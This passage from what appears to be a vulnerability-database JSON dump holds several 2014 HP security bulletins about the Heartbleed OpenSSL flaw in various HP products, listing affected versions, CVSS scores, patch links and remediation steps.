Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW3r0ACgkQ4B86/C0qfVldywCgwtbUfxEMhVuvS81AIP12vW0H\r\nw18AoKFRVIVVjcYhdl94betQ8xPal2sU\r\n=MhNP\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30507", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30507", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04307186\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04307186\r\nVersion: 1\r\n\r\nHPSBMU03044 rev.1 - HP Business Process Monitor, running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-21\r\nLast Updated: 2014-05-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Business\r\nProcess Monitor running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101580\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Business Process Monitor 9.23, 9.24\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available to resolve this\r\nvulnerability:\r\n\r\nBusiness Process Monitor 9.23, download LoadRunner 11.52, patch 2:\r\n\r\nLoad Generator SA for Windows:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LRLG_00051\r\n\r\nLoad Generator SA for Linux:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LR_03304\r\n\r\nBusiness Process Monitor 9.24, download LoadRunner 12.00, patch 1:\r\n\r\nLoad Generator SA for Windows:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LRLG_00052\r\n\r\nLoad Generator SA for Linux:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LR_03333\r\n\r\nHP recommends following our security guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nNOTE: Bulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html.\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEUEARECAAYFAlN81JsACgkQ4B86/C0qfVmU2ACYuoE51YpIHWq6Im2lk4QYgF01\r\nwACgkyjDWjnA1zMlCEl4NElDV/x+cRs=\r\n=/tyK\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-30T00:00:00", "title": "[security bulletin] HPSBMU03044 rev.1 - HP Business Process Monitor, running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-30T00:00:00", "id": "SECURITYVULNS:DOC:30776", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30776", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04255796\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04255796\r\nVersion: 1\r\n\r\nHPSBMU03012 rev.1 - HP Insight Management VCEM Web Client SDK (VCEMSDK)\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-18\r\nLast Updated: 2014-04-18\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nManagement VCEM Web Client SDK (VCEMSDK) running OpenSSL.This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101504\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Management VCEM Web Client SDK (VCEMSDK) 7.2, 7.2.2, and 7.3\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Insight Management VCEM Web Client SDK (VCEMSDK). This\r\nbulletin will be revised when the software updates are released.\r\n\r\nUntil the software updates are available, HP recommends limiting programs\r\nlinked with HP VCEMSDK to use on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 18 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNRP1wACgkQ4B86/C0qfVkaewCg7+4MmkcbuOhazNXgl7B9p7MX\r\nanMAnAgqdtY/rGMoT4p5f5baCZNPdlCk\r\n=ib+P\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03012 rev.1 - HP Insight Management VCEM Web Client SDK (VCEMSDK) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30511", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30511", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04267749\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04267749\r\nVersion: 1\r\n\r\nHPSBMU03024 rev.1 - HP Insight Control Server Deployment on Linux and Windows\r\nrunning OpenSSL with System Management Homepage and Systems Insight Manager,\r\nRemote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP System\r\nManagement Homepage (SMH) running on Linux and Windows and HP Systems Insight\r\nManager (SIM), components of HP Insight Control server deployment. This is\r\nthe OpenSSL vulnerability known as "Heartbleed" which could be exploited\r\nremotely resulting in disclosure of information.\r\n\r\nInsight Control server deployment packages HP System Management Homepage\r\n(SMH) and HP Systems Insight Manager (SIM) and can deploy them through the\r\nbelow list of items. This bulletin will give you the information needed to\r\nupdate your HP Insight Control server deployment solution.\r\n\r\nInstall HP Management Agents for Windows x86/x64\r\nInstall HP Management Agents for RHEL 5 x64\r\nInstall HP Management Agents for RHEL 6 x64\r\nInstall HP Management Agents for SLES 10 x64\r\nInstall HP Management Agents for SLES 11 x64\r\n\r\nReferences: CVE-2014-0160 (SSRT101538)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Insight Control server deployment. This bulletin may be\r\nrevised. It is recommended that customers take the following approaches\r\ndepending on the version of HP Insight Control server deployment:\r\n\r\nTo address the vulnerability in an initial installation of HP Insight Control\r\nserver deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2 only follow steps 1\r\nthrough Step 3 of the following procedure, before initiating an operating\r\nsystem deployment.\r\n\r\nTo address the vulnerability in a previous installation of HP Insight Control\r\nserver deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2 follow all steps in the\r\nfollowing procedure.\r\n\r\nDelete the smhamd64-*.exe/smhx86-*.exe" from Component Copy Location listed\r\nin the following table, row 1,2,3,4.\r\nDelete the affected hpsmh-7.*.rpm" from Component Copy Location listed in the\r\nfollowing table, row 5.\r\nIn sequence, perform the steps from left to right in the following table.\r\nFirst, download components from Download Link; Second, rename the component\r\nas suggested in Rename to. Third, copy the component to the location\r\nsuggested in Component Copy Location.\r\nTable Row Number\r\n Download Link\r\n Rename to\r\n Component Copy Location\r\n\r\n1\r\n http://www.hp.com/swpublishing/MTX-d1488fd987894bc4ab3fe0ef52\r\n smhx86-cp023242.exe\r\n \\express\hpfeatures\hpagents-ws\components\Win2003\r\n\r\n2\r\n http://www.hp.com/swpublishing/MTX-4575754bbb614b58bf0ae1ac37\r\n smhamd64-cp023243.exe\r\n \\express\hpfeatures\hpagents-ws\components\Win2003\r\n\r\n3\r\n http://www.hp.com/swpublishing/MTX-2e19c856f0e84e20a14c63ecd0\r\n smhamd64-cp023240.exe\r\n \\express\hpfeatures\hpagents-ws\components\Win2008\r\n\r\n4\r\n http://www.hp.com/swpublishing/MTX-41199f68c1144acb84a5798bf0\r\n smhx86-cp023239.exe\r\n \\express\hpfeatures\hpagents-ws\components\Win2008\r\n\r\n5\r\n http://www.hp.com/swpublishing/MTX-bfd3c0fb11184796b9428ced37\r\n Do not rename the downloaded component for this step.\r\n \\express\hpfeatures\hpagents-sles11-x64\components\r\n\\express\hpfeatures\hpagents-sles10-x64\components\r\n\\express\hpfeatures\hpagents-rhel5-x64\components\r\n\\express\hpfeatures\hpagents-rhel6-x64\components\r\n\r\nTable 1\r\n\r\nInitiate Install HP Management Agents for SLES 11 x64 on targets running\r\nSLES11 x64.\r\nInitiate Install HP Management Agents for SLES 10 x64 on targets running\r\nSLES10 x64.\r\nInitiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL\r\n6 x64.\r\nInitiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL\r\n5 x64.\r\nInitiate Install HP Management Agents for Windows x86/x64 on targets running\r\nWindows.\r\nRefer to the System Management Homepage security bulletin HPSBMU02998 for\r\nsteps to take after SMH is updated to a version that is not impacted by\r\nHeartbleed, such as changing SMH passwords, and revoking SMH certificates if\r\nimported into HP Systems Insight Manager (two-way trust feature).\r\n\r\nIf you have HP Systems Insight Manager versions v7.3 or v7.3.1 installed,\r\nrefer to security bulletin HPSBMU03022\r\n\r\nRelated security bulletins:\r\n\r\nFor System Management Homepage please see Security bulletin HPSBMU02998 https\r\n://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04\r\n239372\r\n\r\nFor Systems Insight Manager please see Security bulletin HPSBMU03022 https://\r\nh20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04263\r\n236\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhWIkACgkQ4B86/C0qfVlS4gCg3dawaqV9bzwlWOK6Rvo7GBoe\r\n3DIAnjRKVuvFS/HhR5BfuJqFtZdIT5Hc\r\n=lLVw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03024 rev.1 - HP Insight Control Server Deployment on Linux and Windows running OpenSSL with System Management Homepage and Systems Insight Manager, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30494", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30494", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04261644\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04261644\r\nVersion: 2\r\n\r\nHPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-23\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP 3PAR OS\r\nrunning OpenSSL. This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101526\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP 3PAR OS 3.1.2 and subsequent\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nsoftware versions of 3PAR OS. This bulletin will be revised when the software\r\nupdates are released.\r\n\r\nUntil the software update is available, HP recommends limiting 3PAR OS\r\nManagement Tools to use only on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\nVersion:2 (rev.2) - 23 April 2014 Added recommendation for use of 3PAR OS\r\nManagement Tools\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNYMYwACgkQ4B86/C0qfVmSXwCcDoqspliALHdporVpYpZ7t6jF\r\nOnQAn0ec0FZvxPMxM0Uk/iQ7K2kmO1DT\r\n=ORml\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30504", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 3\r\n\r\nHPSBMU02994 rev.3 - HP BladeSystem c-Class Onboard Administrator (OA) running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator (OA) running OpenSSL. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator (OA) v4.11 and v4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made Onboard Administrator (OA) v4.12 and v4.21 available to resolve\r\nthe vulnerability here:\r\n\r\nGo to:\r\nhttp://www.hp.com/go/oa\r\n\r\nClick "Onboard Administrator Firmware"\r\nSelect "HP BLc3000 Onboard Administrator Option" or "HP BLc7000 Onboard\r\nAdministrator Option"\r\nSelect an appropriate operating system from the list of choices\r\nOn the page, find Firmware 4.12 or v4.21 for download\r\n\r\nNotes\r\n\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\nVersion:2 (rev.2) - 18 April 2014 Added software update information for v4.12\r\nVersion:3 (rev.3) - 25 April 2014 Added software update information for v4.21\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 